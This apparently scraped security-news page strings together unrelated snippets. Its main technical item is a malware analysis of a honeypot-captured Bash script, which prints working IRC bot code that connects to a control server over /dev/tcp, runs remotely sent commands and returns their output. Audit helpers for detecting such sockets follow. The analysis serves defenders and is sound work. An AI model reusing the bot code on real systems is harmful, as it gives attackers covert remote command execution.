RSA Conference 2018 Recap: Building a Foundation for Tomorrow’s Cybersecurity

The RSA Conference has gotten bigger and louder — not just because of the clamoring sounds of tens of thousands of attendees, but also due to the din of construction equipment as San Francisco works to rebuild the Moscone Center. Despite all the noise, this year’s attendees heard a number of key themes reverberating loud and clear throughout the conference as experts shared ideas about where the industry is heading and how security professionals can build strong foundations for the future.

WTB: Energetic Bear/Crouching Yeti: attacks on servers

The intelligence in this week’s iteration discusses the following threats: Adblocker Malware, APT28, ARS VBS Loader, Desert Scorpion, DNS Hijacking, Mukstik, PBot, Roaming Mantis, SquirtDanger, Stresspaint, and XiaoBa. The IOCs related to these stories are attached to the WTB and can be used to check your logs for potential malicious activity.

The Risks of Bio-IoT

Trend Micro has been protecting its customers now for almost 30 years. Over that time our mission has not changed. We still fight every day to make the world a safer place to exchange digital information. However, our messaging has needed to evolve to take account of the ever-changing threat landscape, as well as the evolution in user behavior and customers’ IT infrastructure.

How to Manage an Insecure Employee

When employees lack self-confidence, it can be hard to get them to perform at their best. So how can you help them excel at their job? What kind of coaching should you provide? What’s the best way to boost their self-esteem? And how do you deal with your own frustration around their insecure behavior?

BrandPost: Fireside Chat with Renesas Electronics: Talking Security & Threat Protection for Connected Cars

Connected vehicles are the next major technology innovation disrupting the automotive industry. With 3D mapping, smart device integration, cloud-based services, advanced LAN/CAN networks, and autonomous driving defining the connected car of the future, the cyber risks are enormous. And with IoT devices connecting to the car network to access content and applications, the attack surface is even larger. Integrated security is paramount for the safety and consumer confidence in the connected car.

Tech-Support Scammers Are Ramping Up Attacks, Says Microsoft

Microsoft overnight announced that it received 153,000 reports in 2017 from customers who’d come in contact with tech-support scammers via a cold call, spam, or the web. The reports from customers last year were up 24 percent on 2016, with filings coming from 183 countries. Despite being a well-known fraud, some 15 percent of Microsoft customers who reported incidents lost money. Losses were typically between $200 and $400 each. Tim Helming, Director of Product Management at DomainTools commented below.

Protecting Your Employees’ Home IT From Cyberthreats

Increasingly, corporations are realizing that helping employees protect their home IT reduces risks to the company. Depending on the organization’s policies, employees may work with sensitive data or interact with self-service HR platforms remotely, and securing employees’ home technology is in the best interest of the enterprise.

Cyber Scorecarding Services

Ample evidence exists to underline that shortcomings in a third party’s cyber-security posture can have an extremely negative effect on the security integrity of the businesses it connects or partners with. Consequently, for a couple of decades there has been a continuous and frustrated desire for some kind of independent verification or scorecard mechanism that can help primary organizations validate and quantify the overall security posture of the businesses they must electronically engage with.

Malicious Network Traffic From /bin/bash, (Wed, Apr 25th)

One of our readers from Germany sent me a malicious shell script captured by our honeypot[1] running on his Raspberry. It’s a simple UNIX Bash script that performs a bunch of malicious tasks:

  • Kills existing crypto miner processes (classic action these days)
  • Changes the password of the user ‘pi’ and adds an SSH key
  • Changes the DNS resolver configuration and adds some DNS blackholes in /etc/hosts (redirecting to 127.0.0.1)
  • Creates an IRC bot
  • Installs extra tools like zmap and sshpass
  • Installs itself in /etc/rc.local for persistence

The script itself is not new: it was already spotted in July 2017, but it looks slightly modified and was uploaded recently to VT[2] (current score is 9/59). The most interesting part of the script is its ability to run a simple IRC bot using nothing but Bash commands; no high-level language is needed. Bash has had, for years, an interesting feature that not many people are aware of: you can generate network flows using standard redirections. By default, a UNIX process always has the following file descriptors available: 0 (/dev/stdin), 1 (/dev/stdout) and 2 (/dev/stderr). You can use them in commands like:

$ echo "Hello world" >/dev/stderr

In the same way, Bash can use /dev/tcp or /dev/udp to generate network flows. The syntax is /dev/<proto>/<host>/<port>.

That’s the feature used in the sample. Here is how to create a simple bot (the code has been beautified):

# Open fd 3 as a TCP connection to the IRC server and register the bot
eval 'exec 3<>/dev/tcp/$ircserver/6667;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
eval 'printf "NICK $NICK\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
    continue
fi
# Main loop: read one IRC line at a time from fd 3
while [ true ]; do
    eval "read msg_in <&3;"
    if [[ ! "$?" -eq 0 ]] ; then
        break
    fi
    if [[ "$msg_in" =~ "PING" ]] ; then
        # Keep-alive, then join the control channel
        printf "PONG %s\n" "${msg_in:5}";
        eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
        if [[ ! "$?" -eq 0 ]] ; then
            break
        fi
        sleep 1
        eval 'printf "JOIN #biret\r\n" >&3;'
        if [[ ! "$?" -eq 0 ]] ; then
            break
        fi
    elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
        # Private message format: <nick>!...:<base64 RSA signature>:<base64 command>
        privmsg_h=$(echo $msg_in| cut -d':' -f 3)
        privmsg_data=$(echo $msg_in| cut -d':' -f 4)
        privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)
        # The command is only executed if its MD5 matches the RSA-signed value
        hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
        sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`
        if [[ "$sign" == "$hash" ]] ; then
            CMD=`echo $privmsg_data | base64 -d -i`
            RES=`bash -c "$CMD" | base64 -w 0`
            # Output is sent back to the sender, base64-encoded, over the same socket
            eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
            if [[ ! "$?" -eq 0 ]] ; then
                break
            fi
        fi
    fi
done

The magic line is the first one, which creates a new file descriptor (‘3’) that is used to read from and write to the TCP session established with the IRC server on port 6667. The attacker is able to submit commands to the bot via private messages (once authenticated), and the result of each command is sent back.

Be aware that not all Bash binaries have this feature enabled by default (for security reasons). If you want to use it, you can always recompile Bash with the configure option ‘--enable-net-redirections’. This can be helpful in many cases; for example, to grab data from a remote server without any external tools:

exec 5<> /dev/tcp/blog.rootshell.be/80                                # open fd 5 as a TCP socket to the web server
printf "GET / HTTP/1.0\r\nHost: blog.rootshell.be\r\n\r\n" >&5        # the trailing blank line ends the request headers
cat <&5                                                              # read the response until the server closes
exec 5>&-                                                            # close fd 5
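Two small audit helpers for the technique described in this diary, added here as an example (they are not part of the ISC post or the reader’s sample). The first tells you whether the bash on a host was built with net redirections at all, by probing 127.0.0.1 port 1 (an assumption: nothing listens there, so a bash with the feature fails with a socket error while one without it fails with “No such file or directory”); the second scans a directory of scripts for /dev/tcp and /dev/udp redirections and reports the host and port, leaving variables such as $ircserver unexpanded so an analyst knows where to look next.

```shell
#!/bin/sh
# Added example, not part of the ISC diary: audit helpers for /dev/tcp usage.

# Does the bash on this host honour /dev/tcp at all?  A bash built without
# --enable-net-redirections treats the path as a plain file and fails with
# "No such file or directory"; a bash with the feature really calls connect()
# and fails with a socket error instead.  Assumption: nothing listens on
# 127.0.0.1 port 1, so the probe never actually succeeds.
bash_net_redirections() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return; }
    err=$(bash -c 'exec 3<>/dev/tcp/127.0.0.1/1' 2>&1) || true
    case "$err" in
        *"No such file or directory"*) echo "disabled" ;;
        *) echo "enabled" ;;
    esac
}

# Report every /dev/tcp or /dev/udp redirection found in scripts under $1
# as "file line N: proto to host port P".  Unexpanded variables such as
# $ircserver are reported as-is so the analyst knows where to look next.
scan_dev_net() {
    grep -rnoE "/dev/(tcp|udp)/[^/[:space:]\"']+/[^[:space:]\"';]+" "$1" 2>/dev/null |
        sed -E 's#^([^:]+):([0-9]+):/dev/(tcp|udp)/([^/]+)/(.*)$#\1 line \2: \3 to \4 port \5#' |
        sort
}
```

Run `bash_net_redirections` on each host in an inventory, and `scan_dev_net /etc /home /var/spool/cron` (or wherever scripts and rc.local live) to surface socket use that never touches curl, nc or wget.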

Say hello to the new Gmail with self-destructing messages, email snoozing and more

Today, Google is launching the biggest revamp of Gmail in years. The company is bringing to the flagship Gmail service many (but not all) of the features it trialed in Inbox for Gmail, and adding a few new ones, too. With those new features, which we first reported earlier this month, the company is also introducing a refreshed design for the service, though if you’ve used Gmail before, you’ll feel right at home.

Judge was supposed to preside over a Pennsylvania couple’s wedding. She called ICE on them instead

If you want to erode the public’s trust in the legal system, making a court house an unsafe place to be, even during what’s supposed to be a joyful occasion, is a great place to start. Just ask Alexander Parker and Krisha Schmick: They went to a courthouse in Pennsylvania, intent on getting married. The pair had known one another since high school and it seemed like the right time. There was just one problem – Alexander’s skin was brown and the judge he and his bride were to stand before was a raging bigot.